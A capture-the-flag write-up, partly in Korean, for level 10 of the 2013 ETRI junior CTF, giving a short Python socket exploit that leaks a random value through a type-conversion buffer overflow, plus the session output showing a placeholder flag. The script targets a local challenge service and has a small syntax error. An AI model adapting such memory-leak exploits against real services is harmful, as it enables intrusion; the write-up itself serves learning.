2013 ETRI junior ctf level10 write up

level10

binary

# jctf 2013 lv10 exploit -

from socket import *

import time

ip = "127.0.0.1"

port = 31333

payload = "257\n" # type conversion

payload = "134525080\n" # random[16]

payload = "7\n" # exit

payload = "A"*19 #buff ~ 19

payload = "\n" # buff ~ 20

s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))

print s.recv(1024)

s.send("257\n")

print s.recv(1024)

s.send("134525080\n")

print s.recv(1024)

s.send("7\n")

print s.recv(1024)

s.send("A"*19 "\n")

time.sleep(1)

canary = s.recv(1024)

print canary

canary = canary[164:]

print canary

s.send(canary)

print s.recv(1024)

위는 익스플로잇이다.

root@ubuntu:/home/sweetchip/Desktop/cyber/jctf# python ./a.py

Get me your information.

1. Age

2. Sex

3. Birth

4. Favorite number

5. Reversing skill

6. Exploitaion skill

7. Exit this menu

INPUT:

Value?

INPUT:

add_value(): added

Get me your information.

1. Age

2. Sex

3. Birth

4. Favorite number

5. Reversing skill

6. Exploitaion skill

7. Exit this menu

INPUT:

Thanks for the info.

1: number - 00000101, value - 0804b098

Are you trying to buffer overflow?!:

INPUT: [1] error: the buffer is too long. [36][AAAAAAAAAAAAAAAAAAA

ǖ>丒𢡊ඝ

Input the random bytes, if correct, you'll get the flag!

INPUT:

ǖ>丒𢡊ඝ

Input the random bytes, if correct, you'll get the flag!

INPUT:

Oh, wow! Congrats! The key is: this is flag zz << 임시로 만들어둔 플래그입니다.

INPUT:

root@ubuntu:/home/sweetchip/Desktop/cyber/jctf#

원래 로컬 문제지만 그냥 리모트로 돌리고 exploit을 진행했다.

또 이문제는 여러 풀이가 있을수 있지만 이번엔 type conversion buffer overflow 를 이용하여 random값을 유출시킨 뒤 풀었다.